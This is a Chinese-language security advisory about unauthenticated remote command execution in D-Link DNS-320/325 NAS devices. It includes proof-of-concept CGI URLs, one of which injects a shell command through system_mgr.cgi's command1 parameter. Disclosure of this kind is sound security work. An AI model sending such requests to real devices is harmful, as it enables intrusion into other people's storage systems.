发布日期:2012-02-08
更新日期:2012-02-09受影响系统:
D-Link DNS-320 ShareCenter
D-Link DNS-325 ShareCenter
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 51918D-Link是小中大型企业网络连接的厂商。D-Link DNS-320 ShareCenter是千兆网络存储器。D-Link ShareCenter几乎不对CGI脚本中的HTTP请求做任何身份验证,在实现上存在多个远程代码执行漏洞,成功利用后可造成拒绝服务、信息泄露、执行任意代码。<*来源:Roberto Paleari (roberto.paleari@emaze.net)
链接:http://www.securityfocus.com/archive/1/521532
*>测试方法:
--------------------------------------------------------------------------------
警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!http://www.example.com/cgi-bin/system_mgr.cgi?cmd=cgi_sms_test&command1=ls
http://www.example.com/cgi-bin/discovery.cgi
http://www.example.com/cgi-bin/system_mgr.cgi?cmd=get_firm_v_xml建议:
--------------------------------------------------------------------------------
厂商补丁:D-Link
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.dlink.com/Open Handset Alliance Android多个远程安全漏洞Apache Struts多个HTML代码注入漏洞相关资讯 D-Link
- 多个D-Link产品UPnP缓冲区溢出漏洞 (07/29/2015 13:27:45)
- D-Link DIR-601身份验证绕过漏洞 (05/05/2015 14:10:55)
- 多个D-Link产品HNAP命令远程权限提 (04/22/2015 16:56:15)
| - 多个D-Link产品HTTP缓冲区溢出漏洞 (07/29/2015 13:27:16)
- D-Link和趋势网络路由器发现远程执 (04/30/2015 07:44:07)
- D-Link DIR-645命令注入及栈缓冲区 (03/04/2015 06:55:27)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经
|